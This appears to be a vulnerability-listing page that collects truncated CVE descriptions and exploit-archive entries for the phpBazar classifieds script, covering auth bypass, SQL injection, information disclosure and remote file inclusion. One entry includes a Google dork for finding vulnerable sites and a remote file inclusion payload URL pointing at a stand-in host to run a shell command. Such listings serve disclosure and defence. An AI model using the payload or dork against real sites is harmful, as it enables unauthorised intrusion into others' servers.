CVE-2009-4222

phpBazar 2.1.1fix and earlier does not require administrative authentication for admin/admin.php, which allows remote attackers to obtain access to the admin control panel via a direct request...

EUVD-2006-2528

Malware in sbrugna...

EUVD-2008-3753

Malware in sbrugna...

EUVD-2009-4190

Malware in sbrugna...

EUVD-2009-4191

Malware in sbrugna...

EUVD-2006-2527

Malware in sbrugna...

EUVD-2010-2325

Malware in sbrugna...

SmartISoft phpBazar Remote Code Execution (CVE-2010-2315)

A remote code execution vulnerability exists in SmartISoft phpbazar. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system...

phpBazar <= 2.1.0 - Remote (Include/Auth Bypass) Vulnerabilities

No description provided by source. Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password:...

phpBazar admin Information Disclosure Vulnerability

No description provided by source...

phpBazar 2.1.1 stable - rfi Vulnerability

No description provided by source...

phpBazar <= 2.1.1fix (cid) SQL Injection

No description provided by source. / Author : MizoZ from MA Group : EvilWay, evilwayatmaildotcom Email : mizozxatgmaildotcom Greetz : Zuka, Dyle !! MABROOK L3IIIIIIIIIID / The vulnerability is in the $GET'catid' , exploit :...

phpBazar Administrative Disclosure

===================================== phpBazar admin path discloser Vulnerability ===================================== Author :: NetSpy Group :: Aras cyber Army Email :: [email protected] Discover :: 1 july 2010 Critical Lvl :: M Publised :: 22 june 2010 vender :: n/a...

phpBazar admin Information Disclosure Vulnerability

Exploit for php platform in category web applications =================================================== phpBazar admin Information Disclosure Vulnerability =================================================== Author :: NetSpy Group :: Aras cyber Army Email :: email protected Discover :: 1 july...

phpBazar Admin - Information Disclosure

===================================== phpBazar admin information discloser Vulnerability ===================================== Author :: NetSpy Group :: Aras cyber Army Email :: [email protected] Discover :: 1 july 2010 Critical Lvl :: M Published :: 22 july 2010 Vendor ::...

phpBazar Admin - Information Disclosure

phpBazar Admin - Information Disclosure ===================================== phpBazar admin information discloser Vulnerability ===================================== Author :: NetSpy Group :: Aras cyber Army Email :: [email protected]...

CVE-2010-2315

PHP remote file inclusion vulnerability in picturelib.php in SmartISoft phpBazar 2.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the cat parameter...

CVE-2010-2315

The CVE-2010-2315 entry describes a PHP remote file inclusion vulnerability in SmartISoft phpBazar 2.1.1, specifically in picturelib.php where an attacker can trigger arbitrary PHP code execution by supplying a URL in the cat parameter. The underlying issue is improper validation/sanitation of th...

CVE-2010-2315

PHP remote file inclusion vulnerability in picturelib.php in SmartISoft phpBazar 2.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the cat parameter...

phpBazar 2.1.1 Remote File Inclusion

Title: phpBazar V2.1.1 stable rfi Vulnerability Author: Sid3^effects Published: 2010-06-03 Verison: 2.1.1 stable vendor: SmartISoft ooooo .oooooo. oooooo oooooo oooo 888' d8P' Y8b 888. 888. .8' 888 888 888. .8888. .8' 888 888 888 .8'888. .8' 888 888 888.8' 888.8' 888 88b ooo 888' 888' o888o...